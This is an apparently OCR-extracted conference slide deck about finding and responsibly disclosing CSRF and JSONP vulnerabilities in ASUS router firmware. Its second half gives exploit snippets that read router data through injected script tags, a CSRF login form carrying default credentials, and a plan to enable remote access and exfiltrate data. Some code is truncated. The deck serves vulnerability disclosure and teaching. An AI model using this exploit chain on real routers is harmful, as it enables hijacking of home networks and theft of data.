WIXLIB

Hacking ASUS Routers: A Case StudyBy Yakov er 8th, 2017

About Me I was a software developer most of my careerSecurity bug bounty hunter on the sideRecently switched to application security full time butI’m here personally, not on behalf of myemployerWas involved in some early anti-spam work: Co-chaired IRTF’s Anti Spam Research Group Involved in IETF / pre-standards work for SPF andDKIM Created the MARF protocol for exchanging spamreports (RFC 5965)Also did some non-security standards work: RFCs 4180 (CSV files) and 6922 (SQL MIME type) Participated in W3C’s CSV for the Web WG

DISCLAIMER!!!Don’t do anything withouttalking to a lawyer first!

Part 1:Finding router vulnerabilities“This is George. He was very happy. But he had onefault. He was too curious.”

How This Started I am not a network level pen tester but Iplayed with the tools and know the conceptsMost of my security experience has been inapplication security around web and mobileI never cracked open firmware files beforeI was always curious about hardware andhow firmware gets updated

How This Started Have access to an ASUS router with no newfirmware for a whileNew firmware was released in December 2016, Idownloaded it and was applying itThen I thought to myself? Hmm I wonder whereit keeps its brainRouters are just Linux boxes masquerading as anetwork devices – there is code in theresomewhere.

Where I StartedDownloaded latest ASUS firmware andunzipped End up with a .TRX file – what is that? Googled “decompile TRX” file – foundbinwalk – a tool for extracting firmwareimages Installed binwalk, and extracted the TRX file Looked inside and found Linux code and abunch of “*.json” and “*.asp” files – huh? Web UI files?

What Did I do? wget FW RT N56U 30043804180.ZIP unzip FW RT N56U 30043804180.ZIP sudo apt-get install binwalk binwalk -e RT-N56U 3.0.0.4 380 4180-ge57f472.trx cd RT-N56U 3.0.0.4 380 4180-ge57f472.trx.extracted/ ls *.jsonfindasus.json httpd check.json cat findasus.jsoniAmAlive( % findasus(); % ) cat httpd check.jsoniAmAlive( % httpd check(); % ) ls *.aspAdvanced ACL Content.aspget real ip.aspAdvanced AiDisk ftp.aspget release note0.aspAdvanced AiDisk samba.aspget release note1.aspAdvanced AiDisk webdav.aspgetsharearray.aspAdvanced APPList Content.aspgetsharelink.aspAdvanced ASUSDDNS Content.aspgetsl.aspAdvanced BasicFirewall Content.aspgettree.aspAdvanced DHCP Content.aspget webdavInfo.aspAdvanced Exposed Content.aspGuest network.aspAdvanced Feedback.aspindex.aspAdvanced Firewall Content.aspinitial account.aspAdvanced Firewall IPv6 Content.aspinternet.aspAdvanced FirmwareUpgrade Content.asp Logout.aspAdvanced GWStaticRoute Content.aspMain AdmStatus Content.asp.

What Did I do?ASP files are normally Windows IIS server-sidescripts, but the router is obviously running Linux Started looking inside, they looked like HTML andJSON templates. Logged in to the router UI and saw that therequests paths matched the files in firmware Started looking inside the various templates, andnarrowed my search down to JSON templates only JSON templates were wrapped in callbacks –JSONP!!!

Whats Inside the ASP files? cat get real ip.aspfromNetworkmapd ' % get client detail info(); % '.replace(/>/g," ").replace(/</g, " ").split(' '); cat clients.asp !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 .dtd" head meta http-equiv "Content-Type" content "text/html; charset utf-8" / meta HTTP-EQUIV "Pragma" CONTENT "no-cache" meta HTTP-EQUIV "Expires" CONTENT "-1" link rel "shortcut icon" href "images/favicon.png" link rel "icon" href "images/favicon.png" link href "/form style.css" rel "stylesheet" type "text/css" / link href "/NM style.css" rel "stylesheet" type "text/css" / link href "/device-map/device-map.css" rel "stylesheet" type "text/css" / title device-map/clients.asp /title style p{font-weight: bolder;}.circle {position: absolute;width: 23px;.

Hacking the UI Now we are in appsec land!I started analyzing the UI like I would any otherweb application (see OWASP top 10)Looked at the files in the firmware and tried themas endpoints – some worked and some didn’tLooked at network requests while in the router UIFound a bunch of issues, started writing someexploits and they worked!

Responsible DisclosureI contacted both ASUS and CERT, it took some timeto get the right contacts at ASUS ASUS eventually fixed most of the issues, but wehad a disagreement over one (CVE-2017-8877) They sent me the beta firmware to test, it lookedgood for most of the issues Patches were released by ASUS about a monthafter the original report I publicly disclosed about a month after thepatches were released Suddenly got flooded with reports from usersabout other ASUS devices being affected ASUS will be fixing the last issue (CVE-2017-8877)

Lessons Learned “Too curious” is a good thing in security Don’t be afraid of new things Google is a wonderful resource :) Responsible disclosure works

Part 2:Exploiting ASUS router vulnerabilities

Interesting Facts ASUS is under a 20 year FTC consent order on routersecurity since February 2016Total of 42 router models affected (RT-*)Firmware prior to March 2017 is affectedOpen source firmware may be impacted if the code isderived from the ASUS codeASUS router market share is 4.3% / 12,000 units in Q42016 (source: CRN/NPD)For high end WiFi routers, market share is 13% in Q4(source: NetGear/NPD)These vulnerabilities are not network level, butapplication level – similar to issues found in many websites

Here are the vulnerabilities I found– most were patched in March 2017CVE-2017-5891 (CVSS v3: 8.8):CSRF in login and settings pagesCVE-2017-5892 (CVSS v3: 7.5):Authenticated JSONP disclosureCVE-2017-8877 (CVSS v3: 6.5) - unpatched:Unauthenticated JSONP disclosureCVE-2017-8878 (CVSS v3: 6.5):WiFi Password disclosure(cannot be exploited from the web due to cross origin restrictions)

Why is Cross-Site Request Forgery(CSRF) bad? Browser keeps session state in cookies and sendsthe cookie automatically with all requestsEven requests from HTML pages on other domainswill get submitted with valid session cookies(unless “SameSite” cookies are used)Visiting a malicious site while logged to a sensitivesite can allow the malicious site to use the existingsession (“session riding”) unless special controlsare in place

Why is JSONP bad?Browsers do not allow requests across differentdomains (cross origin restrictions) But browsers do allow Javascript to be loaded fromother domains via SCRIPT (unless CSP is used) JSONP is a way to bypass the cross originrestriction by returning JSON data wrapped in aJavascript callback function Sites that have JSONP apis (versus XML or JSONAPIs) are vulnerable to other domains calling theseAPIs in the same browser session Conceptually this is similar to CSRF

Exploit Chain1) Get a user to visit a malicious page or install app (spam,watering hole attack, fake ASUS page, etc.)2) Detect the local IP range or use the ASUS model-specificrouter domain name (WebRTC or network APIs)3) Detect if the network is being fronted by an ASUS router(CVE-2017-8877)4) Login to the router with default credentials or fool user tocollect credentials (CVE-2017-5891)5) Collect data from the router (CVE-2017-5892 and CVE2017-8878)6) Turn-on remote access (CVE-2017-5891)7) Send data back to the attackers8) Powned!!!

1 – Trick user to visit a malicious siteor install app Because this is not a network level attack, it is notpossible to simply scan the whole Internet for ASUSrouters (although other network level attacks do exist)These vulnerabilities are not probably not wormableRequires a user located on the same local network tovisit a malicious site or install a malicious applicationSome ways to trick users would include: Spam Watering hole attack – using an ASUS-dedicatedforum Creating fake ASUS support websites or apps Etc.

2 - Detect the local IP range WebRTC implementations include ways to detect the localIP, may be blockable in some browsers: https://www.w3.org/wiki/Privacy/IPAddressesWebRTC example published by Daniel Roesler in 2015: https://github.com/diafygi/webrtc-ipsFlash can also leak IP addresses but is becoming disabledin browsersOr you can just assume “192.168.1.0” or some otherdefaultIn mobile/desktop apps, it is possible to use the OS APIs todetect the local IP rangeASUS also includes some default domain names that workon ASUS routers – full list not clear (http://rt-66,routerasus.com, etc.)

3 - Detect if the network is being fronted by an ASUSrouter (CVE-2017-8877) Deduce gateway address from local IP For example: 192.168.1.33 192.168.1.1This vulnerability is a JSONP call without authentication,returns some basic information about the router, two endpoints:http://[routerip]/findasus.json - returns the routermodel name, SSID name and the local IP address of therouteriAmAlive([{model?Name: “XXX”, ssid: “YYY”, ipAddr: “ZZZZ”}]) http://[routerip]/httpd check.json – return almostnothing but verifies presence of ASUS routeriAmAlive({“alive”:1, “isdomain”: 0})

3 - Detect if the network is being fronted by an ASUSrouter (CVE-2017-8877)function iAmAlive(payload) {window.alert("Result returned: " JSON.stringify(payload));}function endpoint1() {var script document.createElement('script');script.src tion endpoint2() {var script document.createElement('script');script.src 'http://192.168.1.1/httpd ].appendChild(script);}

4 - Login to the router with default credentials or fooluser to collect credentials (CVE-2017-5891) Login page for the router administrative interface is vulnerable toCSRF, this step can be skipped if the user is already logged inAnother site can login to the router via a form POST request, can use ahidden IFRAME for thatDefault credentials for the router are usually “admin:admin”, mostusers don’t change the defaults :(For users that do change credentials, social engineering or somethingsimilar can be used to collect credentialsExploit code (credentials are base-64 encoded): form action "http://192.168.1.1/login.cgi"method "post" target " blank" input name "login authorization" type "text"value "YWRtaW46YWRtaW4 " / input type "submit" / /form

5 - Collect data from the router (CVE-2017-5892 andCVE-2017-8878) CVE-2017-8878 - returns the WiFi password, onlyavailable in XML, not exploitable from the web due tocross origin but can be exploited from a mobile ordesktop application: http://[routerip]/WPS info.xmlCVE-2017-5892 - JSONP calls requiring authentication,useful for checking of the user is currently logged in orif the previous CSRF login step workedMakes all kind of information about the router andattached devices available

5 - List of endpoints for CVE-2017-5892 (may beincomplete) http://[routerip]/status.asp WAN link informationhttp://[routerip]/wds aplist 2g.asphttp://[routerip]/wds aplist 5g.asp Information about surrounding access points, this is anactive scan with potential for DOShttp://[routerip]/update networkmapd.asp Information about devices on the local networkhttp://[routerip]/update clients.asp Origin informationhttp://[routerip]/get real ip.asp External IP informationhttp://[routerip]/get webdavInfo.asp Information about WebDAV access to the router

5 - Exploit example for CVE-2017-5892 – gettingexternal IP addressfunction getrealip() {var script document.createElement('script');script.src 'http://192.168.1.1/get real pendChild(script);} br/ button onClick "getrealip()" Load IP /button button onClick "window.alert(JSON.stringify(wan0 realip ip))" ShowIP /button

6 - Turn-on remote access (CVE-2017-5891) Some remote administration options that can beenabled in the UI: Logging to a remote server Telnet access Remote web access from external IP via a highport to avoid scanning engines like Shodan Change remote admin timeout Limit remote access to specific IP address Change username and password – if you do this,the user may figure out something is wrong,eventually

5 - ASUS admin UI